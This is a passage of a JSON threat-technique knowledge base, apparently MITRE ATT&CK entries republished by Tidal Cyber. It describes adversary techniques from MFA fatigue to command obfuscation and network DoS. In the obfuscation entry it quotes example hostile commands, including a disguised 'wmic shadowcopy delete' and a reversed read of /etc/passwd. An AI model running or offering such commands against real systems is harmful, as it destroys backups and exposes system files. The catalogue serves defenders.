"description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "49e3504a-e031-45a0-b816-1d3741a78c7f",
"type": "similar"
},
{
"dest-uuid": "630a17c1-0176-4764-8f5c-a83f4f3e980f",
"type": "similar"
}
],
"uuid": "f435a5ff-78d2-44de-b464-2b5528f94adc",
"value": "Modify System Image"
},
{
"description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. <sup>[[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]</sup>\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). <sup>[[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]</sup>\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users phones.<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "600d45ec-cb9c-47b8-ae94-326471ebb007",
"value": "Multi-Factor Authentication Interception"
},
{
"description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”<sup>[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)]</sup><sup>[[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)]</sup><sup>[[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "c0f2efd4-bfc8-43da-9859-14446fb8f289",
"value": "Multi-Factor Authentication Request Generation"
},
{
"description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "e54bdb49-6039-4048-9be6-657a7ff3e071",
"value": "Multi-Stage Channels"
},
{
"description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.<sup>[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)]</sup><sup>[[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)]</sup> These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.<sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup><sup>[[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)]</sup> This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.<sup>[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)]</sup><sup>[[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)]</sup><sup>[[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]</sup>\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.<sup>[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)]</sup><sup>[[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)]</sup><sup>[[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)]</sup><sup>[[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]</sup>\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.<sup>[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)]</sup> Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "1120f5ec-ef1b-4596-8d8b-a3979a766560",
"value": "Native API"
},
{
"description": "Adversaries may bridge network boundaries by modifying a network devices Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.<sup>[[RFC1918](https://app.tidalcyber.com/references/f2cdf62e-cb9b-4a48-99a2-d46e7d9e7a9e)]</sup>\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1599.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "06f738c0-fbab-4d14-83ad-56240c8f35ac",
"value": "Network Address Translation Traversal"
},
{
"description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup> In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "06f738c0-fbab-4d14-83ad-56240c8f35ac",
"type": "similar"
}
],
"uuid": "091282d8-ef05-487f-93aa-445efaeed71b",
"value": "Network Boundary Bridging"
},
{
"description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://app.tidalcyber.com/technique/66657af9-83f7-4a54-b41b-301bfcdae866)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1498.001"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "66657af9-83f7-4a54-b41b-301bfcdae866",
"value": "Direct Network Flood"
},
{
"description": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.<sup>[[Cloudflare ReflectionDoS May 2017](https://app.tidalcyber.com/references/a6914c13-f95f-4c30-a129-905ed43e3454)]</sup> This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS<sup>[[Cloudflare DNSamplficationDoS](https://app.tidalcyber.com/references/734cb2bb-462a-4bdc-9774-6883f99379b9)]</sup> and NTP<sup>[[Cloudflare NTPamplifciationDoS](https://app.tidalcyber.com/references/09ce093a-d378-4915-a35f-bf18a278d873)]</sup>, though the use of several others in the wild have been documented.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.<sup>[[Cloudflare Memcrashed Feb 2018](https://app.tidalcyber.com/references/a2a0c1eb-20ad-4c40-a8cd-1732fdde7e19)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1498.002"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "66cf4803-aec1-4396-afc1-28bc27dd8b2c",
"value": "Reflection Amplification"
},
{
"description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
},
{
"dest-uuid": "66657af9-83f7-4a54-b41b-301bfcdae866",
"type": "similar"
},
{
"dest-uuid": "66cf4803-aec1-4396-afc1-28bc27dd8b2c",
"type": "similar"
}
],
"uuid": "e6c14a7b-1fb8-4557-83e7-7f5b89717311",
"value": "Network Denial of Service"
},
{
"description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.<sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a hosts registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.<sup>[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)]</sup><sup>[[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "5bab1234-8d1e-437f-88a0-d527b2dfc6cd",
"value": "Network Service Discovery"
},
{
"description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. <sup>[[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)]</sup> <sup>[[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)]</sup> [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the <code>net view \\\\\\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "ac5e465f-466d-41e4-933a-04e2c861e820",
"value": "Network Share Discovery"
},
{
"description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup> Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup><sup>[[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)]</sup> The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup>\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `monitor capture`.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "bbad213d-477d-43bf-9501-ad7d74bac323",
"value": "Network Sniffing"
},
{
"description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.<sup>[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)]</sup> Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup> Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.<sup>[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)]</sup> However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "4aed5968-6380-47d2-bbd7-3a4d959089e1",
"value": "Non-Application Layer Protocol"
},
{
"description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088<sup>[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]</sup> or port 587<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup> as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "36850d17-a7d5-41ac-aa89-040b9c0b2b3f",
"value": "Non-Standard Port"
},
{
"description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.<sup>[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]</sup> The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.<sup>[[Securelist Malware Tricks April 2017](https://app.tidalcyber.com/references/3430ac9b-1621-42b4-9cc7-5ee60191051f)]</sup> Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.<sup>[[VirusTotal FAQ](https://app.tidalcyber.com/references/5cd965f6-c4af-40aa-8f08-620cf5f1242a)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8352a63b-7450-4946-93c9-b7434935d794",
"value": "Binary Padding"
},
{
"description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)) or interactively via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c).<sup>[[Akamai JS](https://app.tidalcyber.com/references/379a177b-0c31-5840-ad54-3fdfc9904a88)]</sup><sup>[[Malware Monday VBE](https://app.tidalcyber.com/references/9b52a72b-938a-5eb6-a3b7-5a925657f0a3)]</sup>\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.<sup>[[RC PowerShell](https://app.tidalcyber.com/references/0f154aa6-8c9d-5bfc-a3c4-5f3e1420f55f)]</sup> Many languages support built-in obfuscation in the form of base64 or URL encoding.<sup>[[Microsoft PowerShellB64](https://app.tidalcyber.com/references/7e50721c-c6d5-5449-8326-529da4cf5465)]</sup> Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.<sup>[[Bashfuscator Command Obfuscators](https://app.tidalcyber.com/references/c0256889-3ff0-59de-b0d1-39a947a4c89d)]</sup><sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup>\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).<sup>[[Twitter Richard WMIC](https://app.tidalcyber.com/references/7d701a8e-6816-5112-ac16-b36e71d7c5db)]</sup>\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.<sup>[[Invoke-DOSfuscation](https://app.tidalcyber.com/references/d2f7fe4a-1a3a-5b26-8247-4f05c96974bf)]</sup><sup>[[Invoke-Obfuscation](https://app.tidalcyber.com/references/4cc6a80f-d758-524b-9519-5b839d4918bd)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.010"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d8406198-626c-5659-945e-2b5105fcd0c9",
"value": "Command Obfuscation"
},
{
"description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.<sup>[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]</sup>\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.<sup>[[TrendMicro WindowsAppMac](https://app.tidalcyber.com/references/dc673650-1a37-4af1-aa03-8f57a064156b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "bd52a415-2b7a-4048-84bf-b20f385b357e",
"value": "Compile After Delivery"
},
{
